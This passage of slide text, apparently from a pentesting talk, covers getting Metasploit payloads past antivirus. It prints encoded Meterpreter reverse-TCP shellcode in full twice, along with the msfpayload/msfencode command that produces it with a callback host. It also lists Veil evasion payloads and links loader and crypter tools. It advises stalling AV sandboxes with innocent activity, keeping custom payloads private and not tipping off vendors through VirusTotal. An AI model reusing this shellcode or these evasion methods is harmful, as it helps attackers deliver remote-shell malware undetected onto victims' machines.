  • 10. Simple Payloads  Last year I talked about shellcodeexec.   https://github.com/inquisb/shellcodeexec The punchline is that it takes alphanumericencoded shellcode, stuffs it into memory, and executes it: C:Documents and Settingsroot>sce.exe PYIIIIIIIIIIIIIIII7Q ZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIYlHhoyGps0wpsPnizE4qn2RDNkP RvPnksbtLLKRr24nkCBGXTOX7rjgVFQIoDqIPLlGLaqcLuRFLEpJaxOdMWq ZgirL0BrPWLKV24PlKG25lfaHPnkQPbXmU9PcDszWqxPrpLKCxvxLKf8wPc 1yCM3ElriNkp4LKGqhVdqKOUaiPllkqHOfmC1XG5hIpPuJT7sqmJXWKqmGT 45ZBShNkf8FDS1zsPfnkflPKlK1HGls1hSlKeTNkc1JpoyPDetetskSk1qV 9qJrqkOIpshCoqJnkGbxkLF1MQxp3WBWpgp58qgT3drco2trHBl1g5vfgIo jumhZ0GqUPGpVIYTF4bpPhq9K0BK30iozuF0f0p
  • 11. Formerly Good Payload  Here's how the alphanumeric shellcode is created: $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=1.2.3.4 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX [*] x86/alpha_mixed succeeded with size 634 (iteration=1) PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIYlHhoyGps0wpsP nizE4qn2RDNkPRvPnksbtLLKRr24nkCBGXTOX7rjgVFQIoDqIPLlGLaqcLuRFLEpJa xOdMWqZgirL0BrPWLKV24PlKG25lfaHPnkQPbXmU9PcDszWqxPrpLKCxvxLKf8wPc1 yCM3ElriNkp4LKGqhVdqKOUaiPllkqHOfmC1XG5hIpPuJT7sqmJXWKqmGT45ZBShNk f8FDS1zsPfnkflPKlK1HGls1hSlKeTNkc1JpoyPDetetskSk1qV9qJrqkOIpshCoqJ nkGbxkLF1MQxp3WBWpgp58qgT3drco2trHBl1g5vfgIojumhZ0GqUPGpVIYTF4bpPh q9K0BK30iozuF0f0pPf03pbpSpf03XIz4OYOYpIoKeLWPj7uE85Q7rWswtphvbWpdQ slNi8fCZB0cfPWrHoiOURTcQKOXUK5YP0tflIorn5XrUZLCXzPMeORsfIoN5qz30qz s4cf67ax32JyyXsoIoYELKWFSZQP0huPb0UPWpcfbJePe8BxOTbs8eIoiEmCbs3Zc0 Bv3crwbHER9I8HqOkOZuva8CtiJfLEKFrUjLXCAA
  • 12. Formerly Good Payload  Microsoft Security Essentials catches this!
  • 13. Better Payloads  There is a tool called pyinjector which reimplements the essentials of shellcodeexec in Python.    Creates a writeable and executable memory buffer, stuffs code into it, executes it. You use pyinstaller (http://www.pyinstaller.org/) to create an EXE. Available at: https://www.trustedsec.com/files/pyinjector.zip
  • 14. Better Payloads  There is a tool called Hyperion which encrypts an EXE with AES-128.   The output EXE brute-forces part of the key on startup.   http://www.nullsecurity.net/tools/binary/Hyperion-1.0.zip This prevents AV from extracting the key and decrypting the binary. The stub code for decryption is static!  It is open source though...
  • 15. Best Payloads  The Veil project is a toolkit for creating payloads that evade AV.    https://www.veil-evasion.com/ It is a relatively new project, but is actively maintained and developed. Currently has 22 payloads.
  • 16. Best Payloads Current Veil payloads: c/meterpreter/rev_tcp c/meterpreter/rev_tcp_service c/shellcode_inject/virtual c/shellcode_inject/void cs/meterpreter/rev_tcp cs/shellcode_inject/base64_substitution cs/shellcode_inject/virtual native/Hyperion native/backdoor_factory native/pe_scrambler powershell/shellcode_inject/download_virtual powershell/shellcode_inject/psexec_virtual powershell/shellcode_inject/virtual python/meterpreter/rev_http_contained python/meterpreter/rev_https_contained python/meterpreter/rev_tcp python/shellcode_inject/aes_encrypt python/shellcode_inject/arc_encrypt python/shellcode_inject/base64_substitution python/shellcode_inject/des_encrypt python/shellcode_inject/flat python/shellcode_inject/letter_substitution
  • 17. Best Payloads  Veil and others seem very useful, but being open source is a bit of a weakness when it comes to AV evasion.    This is the same problem that Metasploit has. Nothing beats writing something yourself! Best method is to take what's out there, customize it, and keep it private.
  • 18. Best Payloads   A blog post on the Veil homepage pointed to information on how to make your own Meterpreter stager. With shellcodeexec, the idea was to launch the generated stager to connect to the server, download Meterpreter, and execute it.   shellcodeexec → alphanumeric-encoded stager → Meterpreter Why not write your own stager from scratch?
  • 19. Best Payloads  Someone showed how to write your own windows/meterpreter/reverse_tcp equivalent.    https://github.com/rsmudge/metasploit-loader Basically, you open a TCP connection to the Metasploit server, throw the bytes returned into an executable buffer. Prepend the buffer with a ”mov edi, socket_id” instruction, and jump to it.  Meterpreter will then use the existing TCP session.
  • 20. Best Payloads    How do you customize it? One of the Metasploit developers mentioned that AV puts new binaries into a sandbox for the first N seconds. Do innocent things like read the registry, read some config files, compute digits of pi, etc.  Don't sleep to run down the clock!
  • 21. VirusTotal   VirusTotal (http://www.virustotal.com/) lets you upload binaries to be scanned by 46 AV products. Its common knowledge that they pass on samples to AV vendors.   They know malware authors use it. Your target can pull down a signature in as little as one hour.
  • 22. VirusTotal  vt-notify (https://github.com/mubix/vt-notify) uses the VirusTotal's API to check the SHA-1 hash of your payload.   If you don't get your own API key, it uses a built-in one.   Its been incorporated into Veil. This probably tips them off that its malware! Actually... this functionality as a whole was probably designed as a trap!
  • 23. Building an AV Lab    The best way to check your payload is by building your own AV lab. VirusTotal has 46 products, but how many corporate environments use ”Kingsoft AV”? Symantec and McAfee seem to have the overwhelming market share.  Maybe throw in Kaspersky for good measure too...
  • 24. Building an AV Lab   MSDN Operating Systems subscription is $700 for 1 year. Symantec Small Business Edition costs $60 for a 3 year subscription for 1 endpoint.  McAfee SaaS Endpoint Protection costs $52.  Make sure the AV products don't phone home!
  • 25. Building an AV Lab    I'm now actively building this lab. Once its set up, I'm going to evaluate all these evasion tools. If anyone wants to test some payloads, just let me know!
  • 26. Conclusion    To be a good pentester, you need to know how to bypass AV. Many built-in Metasploit modules no longer work. You have to re-write some or find alternatives. The success of your engagement can entirely depend upon how well you can adapt.  Being a programmer is extremely valuable!